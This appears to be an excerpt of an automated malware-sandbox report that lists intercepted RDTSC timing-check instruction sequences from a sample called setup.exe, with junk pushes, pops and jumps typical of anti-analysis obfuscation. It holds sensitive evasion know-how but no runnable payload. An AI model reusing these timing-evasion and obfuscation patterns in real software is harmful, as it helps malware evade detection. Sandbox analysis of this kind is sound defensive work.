Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0898 second address: 50F089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F089C second address: 50F08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0712 second address: 50F07D7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC169461AA9h 0x00000008 and al, 00000006h 0x0000000b jmp 00007FC169461AA1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC169461A9Eh 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC169461AA1h 0x00000022 sub cx, 4216h 0x00000027 jmp 00007FC169461AA1h 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC169461AA9h 0x00000039 adc ah, 00000026h 0x0000003c jmp 00007FC169461AA1h 0x00000041 popfd 0x00000042 mov cx, A357h 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC169461AA9h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F07D7 second address: 50F07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F07DD second address: 50F07E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F04E3 second address: 50F0553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A282h 0x00000009 sbb eax, 24EDE2A8h 0x0000000f jmp 00007FC16945A27Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007FC16945A285h 0x00000020 pop ecx 0x00000021 mov di, 39B4h 0x00000025 popad 0x00000026 jmp 00007FC16945A27Dh 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007FC16945A283h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100415 second address: 510041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510041B second address: 510041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510041F second address: 510048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC169461AA6h 0x00000011 push eax 0x00000012 jmp 00007FC169461A9Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FC169461AA6h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC169461AA7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510048D second address: 5100493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100493 second address: 5100497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130AA2 second address: 5130AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110596 second address: 51105BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51105BA second address: 51105BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51105BE second address: 51105C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51105C4 second address: 51105C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51105C9 second address: 51105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 76A4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51105ED second address: 511061F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f jmp 00007FC16945A280h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c push eax 0x0000001d push edx 0x0000001e movsx ebx, si 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 511061F second address: 511062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 and dword ptr [eax], 00000000h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 511062D second address: 5110645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110645 second address: 511064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 511064B second address: 511064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 511064F second address: 5110661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110661 second address: 5110673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110673 second address: 5110679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110679 second address: 511067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F062F second address: 50F0640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 538E5431h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0640 second address: 50F0655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC16945A27Fh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0655 second address: 50F0665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, BF11h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F0665 second address: 50F06DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC16945A286h 0x00000008 xor eax, 52771D98h 0x0000000e jmp 00007FC16945A27Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FC16945A288h 0x0000001b mov bx, si 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push ebx 0x00000023 call 00007FC16945A286h 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a movzx ecx, di 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov bx, D79Ch 0x00000035 movsx edx, cx 0x00000038 popad 0x00000039 pop ebp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50F06DF second address: 50F06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100C6 second address: 51100CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100CC second address: 51100D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100D0 second address: 51100D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100D4 second address: 51100FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC169461A9Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC169461A9Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100FA second address: 51100FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51100FE second address: 5110104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5110104 second address: 511010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51301FD second address: 513020B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513020B second address: 513020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513020F second address: 5130215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130215 second address: 513025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A286h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FC16945A280h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov cx, 581Dh 0x00000018 mov ebx, ecx 0x0000001a popad 0x0000001b xchg eax, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC16945A27Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513025A second address: 513026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513026B second address: 513026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513026F second address: 5130275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130275 second address: 5130285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130285 second address: 5130289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130289 second address: 51302BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC16945A27Dh 0x00000010 adc si, FD76h 0x00000015 jmp 00007FC16945A281h 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51302BC second address: 5130314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [76FB65FCh] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC169461A9Fh 0x00000011 or al, FFFFFFAEh 0x00000014 jmp 00007FC169461AA9h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC169461A9Eh 0x00000022 and ch, 00000028h 0x00000025 jmp 00007FC169461A9Bh 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130314 second address: 513036C instructions: 0x00000000 rdtsc 0x00000002 call 00007FC16945A288h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007FC16945A281h 0x00000012 je 00007FC1DB25D897h 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC16945A27Ch 0x0000001f xor cl, FFFFFFE8h 0x00000022 jmp 00007FC16945A27Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ebx, eax 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 513036C second address: 5130391 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b jmp 00007FC169461A9Ah 0x00000010 mov ch, 05h 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, F4EAh 0x0000001d mov ecx, edx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130391 second address: 51303A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51303A4 second address: 51303EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC169461A9Fh 0x0000000c sub esi, 2D0DE2EEh 0x00000012 jmp 00007FC169461AA9h 0x00000017 popfd 0x00000018 popad 0x00000019 ror eax, cl 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC169461A9Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51303EC second address: 51303F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51303F2 second address: 51303F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51303F6 second address: 5130405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130405 second address: 5130409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5130409 second address: 513040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0030 second address: 50E005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC169461AA5h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E005A second address: 50E005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E005E second address: 50E0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0071 second address: 50E0077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0077 second address: 50E00C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007FC169461AA6h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 mov si, C57Dh 0x00000019 push eax 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007FC169461AA3h 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E00C3 second address: 50E0139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FC16945A283h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC16945A284h 0x00000019 sub ecx, 7E877048h 0x0000001f jmp 00007FC16945A27Bh 0x00000024 popfd 0x00000025 jmp 00007FC16945A288h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FC16945A27Bh 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 mov bx, ax 0x00000036 push eax 0x00000037 push edx 0x00000038 mov ebx, ecx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0139 second address: 50E016F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f mov ax, 86D9h 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 mov cx, 3811h 0x0000001a mov edx, eax 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E016F second address: 50E018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 6C5D7986h 0x00000012 mov dl, A8h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E018A second address: 50E01B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E01B9 second address: 50E0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A287h 0x00000009 sbb cx, 6E1Eh 0x0000000e jmp 00007FC16945A289h 0x00000013 popfd 0x00000014 mov ecx, 34299BE7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, 298Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0205 second address: 50E020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E020A second address: 50E0286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A27Ch 0x00000009 adc cl, 00000048h 0x0000000c jmp 00007FC16945A27Bh 0x00000011 popfd 0x00000012 call 00007FC16945A288h 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FC16945A280h 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov esi, 29A2926Dh 0x00000028 call 00007FC16945A27Ah 0x0000002d mov bh, cl 0x0000002f pop edi 0x00000030 popad 0x00000031 test esi, esi 0x00000033 jmp 00007FC16945A27Ah 0x00000038 je 00007FC1DB2A8614h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cl, dh 0x00000043 mov bx, cx 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0286 second address: 50E02FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FC169461A9Dh 0x0000000c sbb esi, 192FF9D6h 0x00000012 jmp 00007FC169461AA1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FC169461A9Eh 0x00000027 je 00007FC1DB2AFDF7h 0x0000002d jmp 00007FC169461AA0h 0x00000032 mov edx, dword ptr [esi+44h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FC169461AA7h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E02FC second address: 50E0301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0301 second address: 50E032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC169461A9Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E032F second address: 50E0354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC16945A281h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E0354 second address: 50E03C6 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 mov si, dx 0x0000000a pop edx 0x0000000b popad 0x0000000c jne 00007FC1DB2AFDBEh 0x00000012 pushad 0x00000013 popad 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007FC169461AA9h 0x0000001d jne 00007FC1DB2AFDB2h 0x00000023 pushad 0x00000024 jmp 00007FC169461A9Ch 0x00000029 pushfd 0x0000002a jmp 00007FC169461AA2h 0x0000002f xor ax, 8638h 0x00000034 jmp 00007FC169461A9Bh 0x00000039 popfd 0x0000003a popad 0x0000003b test bl, 00000007h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E03C6 second address: 50E03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 50E03CA second address: 50E03E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
